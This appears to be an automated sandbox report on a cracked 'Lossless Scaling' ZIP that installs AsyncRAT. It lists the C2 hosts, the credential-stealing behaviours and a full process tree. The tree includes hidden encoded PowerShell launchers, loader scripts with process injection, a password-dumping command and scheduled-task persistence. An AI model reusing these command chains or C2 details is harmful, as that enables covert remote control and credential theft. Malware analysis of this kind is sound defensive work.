Analysis

  • max time kernel
    137s
  • max time network
    146s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64, arch:x86, image:win11-20250217-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    12/03/2025, 10:05

General

  • Target

    lossless scaling.zip

  • Size

    5.5MB

  • MD5

    7cad413146081f6315d82b1dfbebc256

  • SHA1

    5ef84bec1e3b9d5c62a95b08ac133991a1951bf4

  • SHA256

    653c00ae23b0d0001ab2d962daef99c15dbc83b3c676b9f79249ebd757c78d2e

  • SHA512

    e82b5caf11830d2dfef2b8d8c3a5eed116e68ed3f9b4259953155f8474e682bb56b3b7d9e64d8e07b4acf5c22540eb3620a3199e79c161c0eb705ea11179ae74

  • SSDEEP

    98304:Uyf2ZCmbGVSS7jQ3TyQfVp2EhpyZ6DVvpnPqf7waG159wwo2QOWIAeukWahTDCQM:/mUSS7M3TyQfzyZ0dtdm2QbIAeqa5mr5

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

C2

puka1.work.gd:408

puka1.ddnsfree.com:408

ramdan.mywire.org:408

Mutex

MaterxMutex_Egypt408

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a tool written in C# that is designed to remotely monitor and control other computers.

  • Asyncrat family
  • UAC bypass 3 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Control Panel 3 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\lossless scaling.zip"
    1⤵
      PID:3104
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""E:\install + Crack.bat" "
        1⤵
        • Enumerates connected drives
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\system32\net.exe
          net session
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1456
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            3⤵
              PID:3428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3896
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
              3⤵
              • UAC bypass
              • Command and Scripting Interpreter: PowerShell
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1264
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
                4⤵
                • Modifies registry key
                PID:876
              • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
                "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies Control Panel
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:572
              • C:\Windows\system32\schtasks.exe
                "C:\Windows\system32\schtasks.exe" /query /tn administrator
                4⤵
                  PID:4360
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                  4⤵
                    PID:2900
                  • C:\Users\Public\IObitUnlocker\RAR.exe
                    "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
                    4⤵
                    • Executes dropped EXE
                    PID:5028
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1468
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4464
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        6⤵
                          PID:2296
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          6⤵
                            PID:3732
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                            6⤵
                            • System Location Discovery: System Language Discovery
                            • Modifies registry class
                            • Suspicious behavior: AddClipboardFormatListener
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:2332
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Public\External\Components\11.vbs"
                              7⤵
                              • System Location Discovery: System Language Discovery
                              PID:2516
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c set __COMPAT_LAYER=RunAsInvoker && C:\Users\Public\External\Components\a.exe C:\Users\Public\pass.csv
                                8⤵
                                • Access Token Manipulation: Create Process with Token
                                • System Location Discovery: System Language Discovery
                                PID:4716
                                • C:\Users\Public\External\Components\a.exe
                                  C:\Users\Public\External\Components\a.exe C:\Users\Public\pass.csv
                                  9⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Accesses Microsoft Outlook accounts
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4756
                          • C:\Windows\system32\schtasks.exe
                            "C:\Windows\system32\schtasks.exe" /query /tn administrator
                            6⤵
                              PID:2712
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /create /tn administrator /sc minute /mo 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /rl HIGHEST
                              6⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4480
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1636
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4284
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:4264
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /query /tn administrator
                              6⤵
                                PID:1872
                              • C:\Windows\system32\schtasks.exe
                                "C:\Windows\system32\schtasks.exe" /create /tn administrator /sc minute /mo 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /rl HIGHEST
                                6⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:3508
                          • C:\Windows\system32\schtasks.exe
                            "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                            4⤵
                              PID:3596
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /RL HIGHEST
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:1916
                            • C:\Windows\system32\Dism.exe
                              "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
                              4⤵
                              • Drops file in Windows directory
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:396
                              • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\dismhost.exe
                                C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\dismhost.exe {659D6ED2-DAB8-445B-8C83-A1379A68FEBA}
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Windows directory
                                PID:4888
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""E:\Registration (Crack)\Crack.bat" "
                        1⤵
                        • Enumerates connected drives
                        • Suspicious use of WriteProcessMemory
                        PID:5004
                        • C:\Windows\system32\net.exe
                          net session
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2480
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 session
                            3⤵
                              PID:3316
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
                            2⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1176
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
                              3⤵
                              • UAC bypass
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in Program Files directory
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:552
                              • C:\Windows\system32\reg.exe
                                "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
                                4⤵
                                • Modifies registry key
                                PID:4904
                              • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
                                "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Modifies Control Panel
                                • Suspicious use of SetWindowsHookEx
                                PID:328
                              • C:\Windows\system32\schtasks.exe
                                "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                4⤵
                                  PID:4804
                                • C:\Windows\system32\schtasks.exe
                                  "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                                  4⤵
                                    PID:3304
                                  • C:\Windows\system32\schtasks.exe
                                    "C:\Windows\system32\schtasks.exe" /create /tn Backup1 /sc minute /mo 30 /tr C:\Users\Public\IObitUnlocker\Backup.vbs /rl HIGHEST
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1224
                                  • C:\Users\Public\IObitUnlocker\RAR.exe
                                    "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
                                    4⤵
                                    • Executes dropped EXE
                                    PID:1032
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
                                    4⤵
                                      PID:1148
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4620
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                          6⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1560
                                        • C:\Windows\system32\schtasks.exe
                                          "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                          6⤵
                                            PID:964
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
                                        4⤵
                                          PID:932
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3344
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4888
                                            • C:\Windows\system32\schtasks.exe
                                              "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                              6⤵
                                                PID:4756
                                          • C:\Windows\system32\schtasks.exe
                                            "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                                            4⤵
                                              PID:1224
                                            • C:\Windows\system32\Dism.exe
                                              "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
                                              4⤵
                                              • Drops file in Windows directory
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3000
                                              • C:\Users\Admin\AppData\Local\Temp\413055A8-E512-4D32-8BBB-01BE37C66396\dismhost.exe
                                                C:\Users\Admin\AppData\Local\Temp\413055A8-E512-4D32-8BBB-01BE37C66396\dismhost.exe {568AB3C0-E476-4622-BD89-EEB9CB2F381E}
                                                5⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                PID:1088
                                      • C:\Windows\regedit.exe
                                        "regedit.exe" "E:\Registration (Crack)\Double-click, confirm to merge, done.reg"
                                        1⤵
                                        • Runs .reg file with regedit
                                        PID:2812
                                      • \??\E:\lossless scaling.exe
                                        "E:\lossless scaling.exe"
                                        1⤵
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:4264
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""E:\install + Crack.bat" "
                                        1⤵
                                        • Enumerates connected drives
                                        PID:4688
                                        • C:\Windows\system32\net.exe
                                          net session
                                          2⤵
                                            PID:1504
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 session
                                              3⤵
                                                PID:3624
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2484
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
                                                3⤵
                                                • UAC bypass
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in Program Files directory
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1964
                                                • C:\Windows\system32\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2464
                                                • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
                                                  "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Modifies Control Panel
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:404
                                                • C:\Windows\system32\schtasks.exe
                                                  "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                                  4⤵
                                                    PID:4496
                                                  • C:\Windows\system32\schtasks.exe
                                                    "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                                                    4⤵
                                                      PID:396
                                                    • C:\Users\Public\IObitUnlocker\RAR.exe
                                                      "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5016
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
                                                      4⤵
                                                        PID:3056
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4936
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:772
                                                          • C:\Windows\system32\schtasks.exe
                                                            "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                                            6⤵
                                                              PID:404
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
                                                          4⤵
                                                            PID:2056
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                                                              5⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2092
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                6⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4360
                                                              • C:\Windows\system32\schtasks.exe
                                                                "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                                                6⤵
                                                                  PID:3008
                                                            • C:\Windows\system32\schtasks.exe
                                                              "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                                                              4⤵
                                                                PID:2244
                                                              • C:\Windows\system32\schtasks.exe
                                                                "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /RL HIGHEST
                                                                4⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:4856

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Downloads

                                                        • C:\Program Files (x86)\Lossless Scaling\Lan.vbs

                                                          Filesize

                                                          432B

                                                        • C:\Program Files (x86)\Lossless Scaling\Licenses.txt

                                                          Filesize

                                                          16KB

                                                        • C:\Program Files (x86)\Lossless Scaling\Lossless.dll

                                                          Filesize

                                                          4.3MB

                                                        • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe

                                                          Filesize

                                                          953KB

                                                        • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config

                                                          Filesize

                                                          174B

                                                        • C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll

                                                          Filesize

                                                          24KB

                                                        • C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                        • C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll

                                                          Filesize

                                                          18KB

                                                        • C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll

                                                          Filesize

                                                          21KB

                                                        • C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll

                                                          Filesize

                                                          22KB

                                                        • C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll

                                                          Filesize

                                                          19KB

                                                        • C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll

                                                          Filesize

                                                          19KB

                                                        • C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                        • C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll

                                                          Filesize

                                                          25KB

                                                        • C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll

                                                          Filesize

                                                          18KB

                                                        • C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                        • C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                        • C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll

                                                          Filesize

                                                          21KB

                                                        • C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll

                                                          Filesize

                                                          19KB

                                                        • C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                        • C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll

                                                          Filesize

                                                          27KB

                                                        • C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll

                                                          Filesize

                                                          17KB

                                                        • C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll

                                                          Filesize

                                                          17KB

                                                        • C:\Users\Admin\AppData\Local\Lossless Scaling\Settings.xml

                                                          Filesize

                                                          2KB

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismCorePS.dll

                                                          Filesize

                                                          200KB

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismHost.exe

                                                          Filesize

                                                          168KB

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismProv.dll

                                                          Filesize

                                                          292KB

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\ImagingProvider.dll

                                                          Filesize

                                                          248KB

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\LogProvider.dll

                                                          Filesize

                                                          108KB

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\OSProvider.dll

                                                          Filesize

                                                          180KB

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\ServicingCommon.dll

                                                          Filesize

                                                          944KB

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\TransmogProvider.dll

                                                          Filesize

                                                          1.3MB

                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5qycdzl.lnw.ps1

                                                          Filesize

                                                          60B

                                                        • C:\Users\Admin\Desktop\Lossless Scaling.lnk

                                                          Filesize

                                                          1KB

                                                        • C:\Users\Public\IObitUnlocker\Backup.ps1

                                                          Filesize

                                                          438KB

                                                        • C:\Users\Public\IObitUnlocker\Backup.vbs

                                                          Filesize

                                                          308B

                                                        • C:\Users\Public\IObitUnlocker\Devn.exe

                                                          Filesize

                                                          7KB

                                                        • C:\Users\Public\IObitUnlocker\EN.dll

                                                          Filesize

                                                          95KB

                                                        • C:\Users\Public\IObitUnlocker\HKCU.ps1

                                                          Filesize

                                                          451B

                                                        • C:\Users\Public\IObitUnlocker\Lan.vbs

                                                          Filesize

                                                          432B

                                                        • C:\Users\Public\IObitUnlocker\Loader.vbs

                                                          Filesize

                                                          308B

                                                        • C:\Users\Public\IObitUnlocker\RAR.exe

                                                          Filesize

                                                          629KB

                                                        • C:\Users\Public\IObitUnlocker\RAR.exe

                                                          Filesize

                                                          629KB

                                                        • C:\Users\Public\IObitUnlocker\RU.dll

                                                          Filesize

                                                          327B

                                                        • C:\Users\Public\IObitUnlocker\Report.ps1

                                                          Filesize

                                                          458KB

                                                        • C:\Users\Public\IObitUnlocker\UK.dll

                                                          Filesize

                                                          5KB

                                                        • C:\Users\Public\IObitUnlocker\Win.ps1

                                                          Filesize

                                                          6KB

                                                        • C:\Users\Public\IObitUnlocker\diagerr.xml

                                                          Filesize

                                                          1KB

                                                        • C:\Users\Public\IObitUnlocker\done.reg

                                                          Filesize

                                                          250B

                                                        • C:\Windows\Logs\DISM\dism.log

                                                          Filesize

                                                          285KB

                                                        • C:\Windows\Logs\DISM\dism.log

                                                          Filesize

                                                          288KB
